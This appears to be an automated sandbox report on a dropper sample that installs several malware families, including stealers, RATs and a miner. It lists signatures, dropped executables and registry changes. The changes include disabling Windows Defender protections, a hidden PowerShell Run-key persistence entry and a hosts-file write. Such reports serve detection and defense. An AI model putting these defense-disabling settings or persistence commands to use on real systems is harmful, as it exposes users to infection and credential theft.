Malware Analysis Report

2025-06-16 01:29

Sample ID 231031-d3hc5sgd2x
Target f7a0efbe97f4cea30f374bb740099b33.bin
SHA256 3aeb57217fd4b1f2c686a779e48cc5f769d55b0f7677818155c2f131ef04af81
Tags
amadey dcrat glupteba raccoon redline sectoprat smokeloader xmrig zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3aeb57217fd4b1f2c686a779e48cc5f769d55b0f7677818155c2f131ef04af81

Threat Level: Known bad

The file f7a0efbe97f4cea30f374bb740099b33.bin was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline sectoprat smokeloader xmrig zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx

SectopRAT payload

RedLine

xmrig

Detect ZGRat V1

Suspicious use of NtCreateUserProcessOtherParentProcess

DcRat

Glupteba payload

RedLine payload

SectopRAT

SmokeLoader

Modifies Windows Defender Real-time Protection settings

Glupteba

Amadey

ZGRat

Raccoon

Raccoon Stealer payload

XMRig Miner payload

Modifies Windows Firewall

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Windows security modification

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

UPX packed file

Adds Run key to start application

Checks installed software on the system

Accesses Microsoft Outlook profiles

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Detected potential entity reuse from brand paypal.

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

outlook_win_path

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 03:31

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 03:31

Reported

2023-10-31 03:34

Platform

win7-20231023-en

Max time kernel

119s

Max time network

123s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\f7a0efbe97f4cea30f374bb740099b33.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\f7a0efbe97f4cea30f374bb740099b33.zip

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-31 03:31

Reported

2023-10-31 03:34

Platform

win10v2004-20231023-en

Max time kernel

142s

Max time network

153s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\f7a0efbe97f4cea30f374bb740099b33.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\f7a0efbe97f4cea30f374bb740099b33.zip

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2023-10-31 03:31

Reported

2023-10-31 03:34

Platform

win10v2004-20231020-en

Max time kernel

81s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4894.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7wp9jb68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\13A2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\14CC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Av10fD7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\176E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1B68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2dU814HH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2348.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4894.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4B74.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\670B.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6E01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7FE5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\4B74.exe'\"" C:\Users\Admin\AppData\Local\Temp\4B74.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\13A2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\KAudioConverter\is-MVMLB.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-R7QLO.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-U56V4.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-BO41E.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-G1IHK.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-QU738.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-JBN5H.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-1IV0A.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-C25U4.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-SH1L9.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-5STTU.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-6Q3GM.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-N9T6Q.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-TN9JA.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-NN5FA.tmp C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
